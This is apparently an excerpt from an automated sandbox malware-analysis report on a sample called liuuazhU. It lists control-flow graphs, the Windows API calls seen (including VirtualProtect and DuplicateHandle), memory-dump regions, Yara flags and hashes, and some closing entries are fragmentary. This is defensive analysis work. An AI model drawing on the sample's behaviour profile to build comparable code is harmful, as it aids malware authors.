                                                                                        control_flow_graph 682 40cbf7-40cc06 683 40cc08-40cc14 682->683 684 40cc2f 682->684 683->684 685 40cc16-40cc1d 683->685 686 40cc33-40cc3d call 40d534 684->686 685->684 687 40cc1f-40cc2d 685->687 690 40cc47 686->690 691 40cc3f-40cc46 call 40cbb4 686->691 687->686 692 40cc47 call 41087e 690->692 691->690 694 40cc4c-40cc4e 692->694 696 40cc50-40cc57 call 40cbb4 694->696 697 40cc58-40cc68 call 4129c9 call 411a15 694->697 696->697 704 40cc72-40cc82 GetCommandLineA call 412892 697->704 705 40cc6a-40cc71 call 40e79a 697->705 710 40cc87 call 4127d7 704->710 705->704 711 40cc8c-40cc8e 710->711 712 40cc90-40cc97 call 40e79a 711->712 713 40cc98-40cc9f call 41255f 711->713 712->713 718 40cca1-40cca8 call 40e79a 713->718 719 40cca9-40ccb3 call 40e859 713->719 718->719 724 40ccb5-40ccbb call 40e79a 719->724 725 40ccbc-40ccd3 call 4019f0 719->725 724->725 729 40ccd8-40cce2 725->729 730 40cce4-40cce5 call 40ea0a 729->730 731 40ccea-40cd2e call 40ea36 call 40e21d 729->731 730->731
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                        • String ID:
                                                                                        • API String ID: 2598563909-0
                                                                                        • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                        • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                        • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                        • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1316 4018f0-4018fa 1317 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 1316->1317 1318 4018fc-401900 1316->1318 1321 401940-401949 GetLastError 1317->1321 1322 401996-40199a 1317->1322 1323 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 1321->1323 1324 40198d-40198f 1321->1324 1323->1324 1324->1322 1326 401991 call 401030 1324->1326 1326->1322
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3322701435-0
                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1329 210149dc-21014a6f GetCurrentProcess 1333 21014a71-21014a77 1329->1333 1334 21014a78-21014aac GetCurrentThread 1329->1334 1333->1334 1335 21014ab5-21014ae9 GetCurrentProcess 1334->1335 1336 21014aae-21014ab4 1334->1336 1338 21014af2-21014b0d call 21014bbc 1335->1338 1339 21014aeb-21014af1 1335->1339 1336->1335 1342 21014b13-21014b42 GetCurrentThreadId 1338->1342 1339->1338 1343 21014b44-21014b4a 1342->1343 1344 21014b4b-21014bad 1342->1344 1343->1344
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 21014A5E
                                                                                        • GetCurrentThread.KERNEL32 ref: 21014A9B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 21014AD8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 21014B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 878859262c0c52ba6fad88bffe27b5e44fb915ce19f09ba45429ee191ba99375
                                                                                        • Instruction ID: 514bce16db16a77b72e888d865fb6354785dea3fdf81afbd555d352a821738f8
                                                                                        • Opcode Fuzzy Hash: 878859262c0c52ba6fad88bffe27b5e44fb915ce19f09ba45429ee191ba99375
                                                                                        • Instruction Fuzzy Hash: 615146B09006098FDB15CFA9D988BEEBBF1EF88304F24C169D019A7360D7749945CF69

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1351 210149e0-21014a6f GetCurrentProcess 1355 21014a71-21014a77 1351->1355 1356 21014a78-21014aac GetCurrentThread 1351->1356 1355->1356 1357 21014ab5-21014ae9 GetCurrentProcess 1356->1357 1358 21014aae-21014ab4 1356->1358 1360 21014af2-21014b0d call 21014bbc 1357->1360 1361 21014aeb-21014af1 1357->1361 1358->1357 1364 21014b13-21014b42 GetCurrentThreadId 1360->1364 1361->1360 1365 21014b44-21014b4a 1364->1365 1366 21014b4b-21014bad 1364->1366 1365->1366
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 21014A5E
                                                                                        • GetCurrentThread.KERNEL32 ref: 21014A9B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 21014AD8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 21014B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: f9c590df0ee3920de35fd0eea3dad32afc987a435176818e2a6bca45018a641c
                                                                                        • Instruction ID: 4c22fb992c33f49245168a09d5a43cc838af2c62142a407e8c8e40ddf9ebf3b5
                                                                                        • Opcode Fuzzy Hash: f9c590df0ee3920de35fd0eea3dad32afc987a435176818e2a6bca45018a641c
                                                                                        • Instruction Fuzzy Hash: 495136B09007098FDB14CFAAD988BEEBBF1EF88314F24C169D519A7260D7749944CF69

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1373 40af66-40af6e 1374 40af7d-40af88 call 40b84d 1373->1374 1377 40af70-40af7b call 40d2e3 1374->1377 1378 40af8a-40af8b 1374->1378 1377->1374 1381 40af8c-40af98 1377->1381 1382 40afb3-40afca call 40af49 call 40cd39 1381->1382 1383 40af9a-40afb2 call 40aefc call 40d2bd 1381->1383 1383->1382
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1411284514-0
                                                                                        • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                        • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1657 20d132d0-20d137be 1732 20d13d10-20d13d45 1657->1732 1733 20d137c4-20d137d4 1657->1733 1738 20d13d51-20d13d6f 1732->1738 1739 20d13d47-20d13d4c 1732->1739 1733->1732 1734 20d137da-20d137ea 1733->1734 1734->1732 1736 20d137f0-20d13800 1734->1736 1736->1732 1737 20d13806-20d13816 1736->1737 1737->1732 1740 20d1381c-20d1382c 1737->1740 1750 20d13d71-20d13d7b 1738->1750 1751 20d13de6-20d13df2 1738->1751 1741 20d13e36-20d13e3b 1739->1741 1740->1732 1742 20d13832-20d13842 1740->1742 1742->1732 1744 20d13848-20d13858 1742->1744 1744->1732 1746 20d1385e-20d1386e 1744->1746 1746->1732 1747 20d13874-20d13884 1746->1747 1747->1732 1749 20d1388a-20d1389a 1747->1749 1749->1732 1752 20d138a0-20d13d0f 1749->1752 1750->1751 1756 20d13d7d-20d13d89 1750->1756 1757 20d13df4-20d13e00 1751->1757 1758 20d13e09-20d13e15 1751->1758 1765 20d13d8b-20d13d96 1756->1765 1766 20d13dae-20d13db1 1756->1766 1757->1758 1768 20d13e02-20d13e07 1757->1768 1763 20d13e17-20d13e23 1758->1763 1764 20d13e2c-20d13e2e 1758->1764 1763->1764 1777 20d13e25-20d13e2a 1763->1777 1764->1741 1765->1766 1779 20d13d98-20d13da2 1765->1779 1769 20d13db3-20d13dbf 1766->1769 1770 20d13dc8-20d13dd4 1766->1770 1768->1741 1769->1770 1781 20d13dc1-20d13dc6 1769->1781 1772 20d13dd6-20d13ddd 1770->1772 1773 20d13e3c-20d13e54 1770->1773 1772->1773 1778 20d13ddf-20d13de4 1772->1778 1783 20d13e67-20d13e98 call 20d14001 1773->1783 1784 20d13e56-20d13e66 1773->1784 1777->1741 1778->1741 1779->1766 1787 20d13da4-20d13da9 1779->1787 1781->1741 1791 20d13eab-20d13eb6 1783->1791 1792 20d13e9a-20d13ea5 1783->1792 1784->1783 1787->1741 1798 20d13f87-20d13fcc call 20d12d48 1791->1798 1799 20d13ebc-20d13f19 1791->1799 1792->1791 1797 20d13f2e-20d13f80 1792->1797 1797->1798 1817 20d13fdd-20d13feb 1798->1817 1818 20d13fce-20d13fdb 1798->1818 1808 20d13f22-20d13f2b 1799->1808 1825 20d13ff9 1817->1825 1826 20d13fed-20d13ff7 1817->1826 1824 20d13ffb-20d13ffe 1818->1824 1825->1824 1826->1824
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$$^q$$^q
                                                                                        • API String ID: 0-27156697
                                                                                        • Opcode ID: fd22bd291b6f48195610d75538ab53cccedbb566e41dec136ac69fc788363387
                                                                                        • Instruction ID: deb1c55b70a9181f3dd12d405b8b430ede40f3fc21689f30b5966560c9ac1047
                                                                                        • Opcode Fuzzy Hash: fd22bd291b6f48195610d75538ab53cccedbb566e41dec136ac69fc788363387
                                                                                        • Instruction Fuzzy Hash: 78727274A00218CFDB159BE8D894B9EBB76EF84300F2081A9D406AB3A5DE359D89DF51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph: basic-block edge listing for the function starting at 20d11079 (rendered graph not recoverable from text)
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,bq$,bq
                                                                                        • API String ID: 0-2699258169
                                                                                        • Opcode ID: 133f61c9a2d5dbdcbacb4e99628971b15a7e950a007a37dc158d2b62216763e2
                                                                                        • Instruction ID: abdf943a901e5c39f41e54dda496bcefcd147d092337860710573c27418660f1
                                                                                        • Opcode Fuzzy Hash: 133f61c9a2d5dbdcbacb4e99628971b15a7e950a007a37dc158d2b62216763e2
                                                                                        • Instruction Fuzzy Hash: 4781C038A052069FCB04CFE8E885A9EF7F2BF89204B24826DD515DB361CB31DC85CB55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hbq$Hbq
                                                                                        • API String ID: 0-4258043069
                                                                                        • Opcode ID: 10a554725f527bb61969a58ccdd08a52d925b643872994791d031f2de16bb19c
                                                                                        • Instruction ID: d8ddfcafdd4647f090359986e8b0d0112d9f078127b625149aa1b2013214de8d
                                                                                        • Opcode Fuzzy Hash: 10a554725f527bb61969a58ccdd08a52d925b643872994791d031f2de16bb19c
                                                                                        • Instruction Fuzzy Hash: 8761F1712092558FCB029FA4E844B6EBFF6BF85300F588959E845DB391DBB8CC81CB91
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 2101D812
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 57cb42554dc761050db39bd0b226e5eae047cc83b56c11ae15a06dce630ec5d4
                                                                                        • Instruction ID: 01e130a127b4533ca34c06a9d9c238beebbd164c4fd14c4001b702325bda3040
                                                                                        • Opcode Fuzzy Hash: 57cb42554dc761050db39bd0b226e5eae047cc83b56c11ae15a06dce630ec5d4
                                                                                        • Instruction Fuzzy Hash: 52915470A00B498FDB25CF69C484B9ABBF1BF49300F00896ED48AE7654D739E949CF90
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2101FAB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: bcd1bc80e6085c215e224840a6bf0bb1fb1bc325392f590689a479091a0878d5
                                                                                        • Instruction ID: bfb220e7e7ad4cb804a49801964c6f2921f9308102bed01c38a9939a56941a15
                                                                                        • Opcode Fuzzy Hash: bcd1bc80e6085c215e224840a6bf0bb1fb1bc325392f590689a479091a0878d5
                                                                                        • Instruction Fuzzy Hash: AF717AB4D00218DFDF60CFA9D980ADDBBF1BB0A304F1491AAE858A7215D774AA85CF45
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 21014CF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 4f26cd4fd55a3fac2a1c812aaaeeabfcf2c8c6ef3106eb32003fe7ed789efa47
                                                                                        • Instruction ID: 2ffc023fa9835186c2c3a014136dcab652a8f6d01f604a3c7c918c7a1adcaf2a
                                                                                        • Opcode Fuzzy Hash: 4f26cd4fd55a3fac2a1c812aaaeeabfcf2c8c6ef3106eb32003fe7ed789efa47
                                                                                        • Instruction Fuzzy Hash: EA4155B9D002589FCF00CFA9D984ADEBFF5BB09310F14906AE918AB321D375A985CF54
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 21014CF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 5b7cb4800b1de85664a3beb0cb757eb9ef359187b46ea685e9f33d28d6386da2
                                                                                        • Instruction ID: 15d12277bf3489cd013991360fd23d4f2f7be831771bfcc7ac4622a3b3ec2e63
                                                                                        • Opcode Fuzzy Hash: 5b7cb4800b1de85664a3beb0cb757eb9ef359187b46ea685e9f33d28d6386da2
                                                                                        • Instruction Fuzzy Hash: 444145B9D002589FCF00CFAAD984ADEBBF5BB09310F14906AE918AB321D375A945CF54
                                                                                        APIs
                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 1CFCF01C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108680787.000000001CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CFC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cfc0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 78d3849dda654223b542d53588b02cefe3e73106574cf6f861fae438713d82f3
                                                                                        • Instruction ID: ae112f8e7153c56b6d8a8c81d67d6b3577c1732915c7df22407a5d1cd3c37120
                                                                                        • Opcode Fuzzy Hash: 78d3849dda654223b542d53588b02cefe3e73106574cf6f861fae438713d82f3
                                                                                        • Instruction Fuzzy Hash: B231A7B4E012599FCF14CFA9D980ADEFBB0BF49310F20902AE819B7210D735A945CF68
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 21171E81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113302494.0000000021170000.00000040.00000800.00020000.00000000.sdmp, Offset: 21170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21170000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: 868dee09fd44fde61cd8cfe813eedad646ae6b5cff2a5afd9da0cccd5b0ec978
                                                                                        • Instruction ID: 96bfd1cb8ab6b01b04a2a10e7ab98b000e0507c359e70feb348047209fd9fe61
                                                                                        • Opcode Fuzzy Hash: 868dee09fd44fde61cd8cfe813eedad646ae6b5cff2a5afd9da0cccd5b0ec978
                                                                                        • Instruction Fuzzy Hash: F04146B4900319CFCB15CF89C888AAABBF5FF88314F24C959D518AB321D774A941CFA0
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 2101D812
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 88695f2b86b71bc2a6dc0a1573de41758d2b6568749c71decdd96bee466f5933
                                                                                        • Instruction ID: e93931a11ee8ca3257a6829bb2ef893c9828b3e9c2ebb690f38d86139042e60c
                                                                                        • Opcode Fuzzy Hash: 88695f2b86b71bc2a6dc0a1573de41758d2b6568749c71decdd96bee466f5933
                                                                                        • Instruction Fuzzy Hash: 1B31A7B8D00259DFCB14CFAAD584ADEFBF5AB49310F14906AE818B7320D375A945CFA4
                                                                                        APIs
                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 201864B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d176e93356051a1edfba610ddd6f18fb2e11cb5b33297a2a0ce1d02bcf0adc1b
                                                                                        • Instruction ID: 3843ce8deb3c08bae075ea9aac7caca290fd2b0523bc8bb8edc15b0048238b8b
                                                                                        • Opcode Fuzzy Hash: d176e93356051a1edfba610ddd6f18fb2e11cb5b33297a2a0ce1d02bcf0adc1b
                                                                                        • Instruction Fuzzy Hash: 2C113DB4A011199FEB04DFE8D884EADBBB5FB88304F61D165E914E7246DB34AB45CF10
                                                                                        APIs
                                                                                          • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                        • SysAllocString.OLEAUT32 ref: 00401898
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocString_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 959018026-0
                                                                                        • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                        • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                        • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                        • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                        APIs
                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 10892065-0
                                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: 3b7ef69404cd39e3ded5471c4f76b8bcba15889d7d9fada08a1ec43aea3810b6
                                                                                        • Instruction ID: 89221f5bb7e141ad0d9f28e72aaf5abb3b112404cf76b924e5ae18f17f1d9a00
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 851181db25b1af4b240d08078f89b7538180ba9d8fe6dcfc221e0ec2691697b4
                                                                                        • Instruction ID: ab4038fc24635ae786d51cb16e7c5b27a31b12d849b6ca082905bbc66fb65e5a
                                                                                        • Opcode Fuzzy Hash: 851181db25b1af4b240d08078f89b7538180ba9d8fe6dcfc221e0ec2691697b4
                                                                                        • Instruction Fuzzy Hash: C0E0C27580C3945ED703E37098A9BD93F719B42201F05426AD405866A7DEA4888E4719
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9064c6c68ce3b6c5e38ee8bd3c84d89e8ed86a0b18918f5fbdc67975aba51396
                                                                                        • Instruction ID: 4f7e6b9aeb3305fd1d71a426e4ab39499fcec460545fd7a85e89e6460f54b756
                                                                                        • Opcode Fuzzy Hash: 9064c6c68ce3b6c5e38ee8bd3c84d89e8ed86a0b18918f5fbdc67975aba51396
                                                                                        • Instruction Fuzzy Hash: A6D0173AB00108EFCB008F88EC408DDB7B6FB98221B008026E911A3220C6319821DB54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc0cd8b6d2e7b3f5117108eadd2157ca1ee4017afbe774c5d2f1bf6e3a5d2b72
                                                                                        • Instruction ID: dbeb0db8f8b8b35589db8bd9cccd8356271586e0b1a25582086b0ca78391ae05
                                                                                        • Opcode Fuzzy Hash: bc0cd8b6d2e7b3f5117108eadd2157ca1ee4017afbe774c5d2f1bf6e3a5d2b72
